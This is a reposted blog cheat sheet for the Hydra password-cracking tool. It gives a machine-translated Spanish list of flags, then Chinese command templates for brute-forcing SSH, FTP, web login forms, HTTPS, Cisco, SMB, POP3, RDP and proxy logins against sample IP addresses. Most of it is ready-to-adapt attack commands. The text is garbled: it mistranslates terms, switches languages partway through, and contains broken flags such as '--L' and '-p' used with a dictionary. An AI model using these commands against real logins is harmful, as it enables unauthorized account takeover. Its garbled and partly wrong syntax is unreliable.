Hydra (Hydra) agrietamiento por fuerza bruta

Agrietamiento por fuerza bruta: parámetros de
hydra (Hydra)
:
-R continuar agrietándose desde el progreso anterior
-S mayúsculas, usando el enlace SSL
-s minúsculas, puede especificar un puerto no predeterminado a través de este parámetro
-l especificar el usuario agrietado, crack para un usuario específico
-L especifica el diccionario de nombres de usuario
-p minúsculas, especifica el descifrado de contraseñas, usa menos, típicamente usando diccionario de contraseñas
-P mayúsculas, especifica un diccionario de contraseñas
-e opciones seleccionables, n: una tentación de contraseña en blanco, s: usando el tentación de usuario y contraseña especificados
- C Utilice un formato separado por dos puntos, como "nombre de inicio de sesión: contraseña" en lugar de -L / -P parámetro
-M especifica el archivo de lista de destino una línea por línea
-o especifica el archivo de salida de resultados
-f Después utilizando el parámetro -M, busque el primer par de nombres de inicio de sesión O deje de descifrar la contraseña
-t El número de subprocesos que se ejecutan al mismo tiempo, el valor predeterminado es 16
-w Establezca el tiempo de espera máximo, en segundos, el valor predeterminado es 30 s
- v / -V Muestra el proceso detallado

Comandos específicos de cada protocolo:
formato + ejemplo:

1、破解ssh:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip ssh
hydra -l 用户名 -p 密码字典 -t 线程 -o save.log -vV ip ssh

2、破解ftp:
hydra ip ftp -L 用户名字典 -P 密码字典 -t 线程(默认16) -vV
hydra ip ftp -l 用户名 -P 密码字典 -e ns -vV

3、get方式提交,破解web登录:
hydra -L 用户名字典 -p 密码字典 -t 线程 -vV -e ns ip http-get/admin/
hydra -l 用户名 -p 密码字典 -t 线程 -vV -e ns -f ip http-get/admin/index.PHP

4、post方式提交,破解web登录:
hydra --L 用户名字典 -P 密码字典 -s 80 ip http-post-form"/admin/login.php:username=^USER^&password=^PASS^&submit=login:sorrypassword"
hydra -t 3 -l admin -P pass.txt -o out.txt -f 10.36.16.18 http-post-form"login.php:id=^USER^&passwd=^PASS^:<title>wrong username orpassword</title>"
参数说明:
-t同时线程数3,-l用户名是admin,字典pass.txt,保存为out.txt,-f 当破解了一个密码就停止,
10.36.16.18目标ip,http-post-form表示破解是采用http的post方式提交的表单密码破解,<title>中的内容是表示错误猜解的返回信息提示

5、破解https:
hydra -m /index.php -l muts -P pass.txt 10.36.16.18 https
6、破解teamspeak:
hydra -L 用户名字典 -P 密码字典 -s 端口号 -vV ip teamspeak

7、破解cisco:
hydra -P pass.txt 10.36.16.18 cisco
hydra -m cloud -P pass.txt 10.36.16.18 cisco-enable

8、破解smb:
hydra -L 用户名字典 -P pass.txt 10.36.16.18 smb

9、破解pop3:
hydra -l muts -P pass.txt my.pop3.mail pop3

10、破解rdp:
hydra ip rdp -l administrator -P pass.txt -V

11、破解http-proxy:
hydra -l admin -P pass.txt http-proxy://10.36.16.18

Supongo que te gusta

Origin blog.csdn.net/weixin_42478365/article/details/113699665
Recomendado
Clasificación